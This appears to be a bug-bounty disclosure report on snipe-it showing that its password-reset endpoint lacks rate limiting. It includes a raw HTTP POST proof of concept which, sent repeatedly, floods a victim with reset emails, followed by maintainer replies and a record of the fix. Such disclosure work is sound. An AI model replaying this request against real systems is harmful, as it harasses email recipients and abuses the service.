Insufficient Granularity of Access Control in snipe/snipe-it


Reported on

Oct 7th 2021


There is no rate limit sent unlimited email victim or any email address

Proof of Concept

There is no rate limit return-password , attacker to send unlimited email to victim or any email address.

POST /password/email HTTP/1.1


Connection: close

Content-Length: 62

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1


Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed- exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document


Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: snipeitv48_session=h0w6J6utAn2wIe4EMMkWHJVI2PTaOzBPLLuOH4JG; XSRF- TOKEN=eyJpdiI6IkttM01uZ1lpMHZFY3I5a0wxVlVnUXc9PSIsInZhbHVlIjoiVVlvemxGd3JXQjkxNTh2OTJHNGpDZ3VzTGY4NFc1K1N4dld4ekFiN2h0Y1RscFZJa2pUcFVZVkpzamxKeGZhWG9IdlZxdlhaRkdtQk1iMkZ2dmJpVDc0Zmx2VDJqMkpNY0p6RWpDWW5ZWDV4MHN3OEZIYk1TYTk2aWlOUm9qNU4iLCJtYWMiOiI3ZWY0ZTYyNTNlNDEzZGQzOTI2OTVhYWQ2OWY4M2I3MmZjOWM1MTc4ODYzNGYzYTQ5MGYwY2NlMGE4ODVjNjMxIn0%3D


Post data username= parameter value to victim username. this request unlimited time and victim email address will received unlimited verification email .


Attacker can sent unlimited email to any mail address .


'reset_password_tries_limit'=>5, 'reset_password_tries'=>"int(10) unsigned DEFAULT '0'",

We have contacted a member of the snipe/snipe-it team and are waiting to hear back a year ago
a year ago


While this isn't incorrect, we have never ever seen this exploited in the wild. You'd need to know the URL and username of a user on the system.

a year ago


Well, yes we need that, for every attack we need URL isn't it and about the valid username, an attacker may or may not know the username can do the dictionary attack to perform the attack. And please do refer this previously submitted report too

a year ago


any update??

a year ago


If there was an update, I'd have said so. It's been one day.

snipe validated this vulnerability a year ago
takester has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe marked this as fixed with commit 702791 a year ago
snipe has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation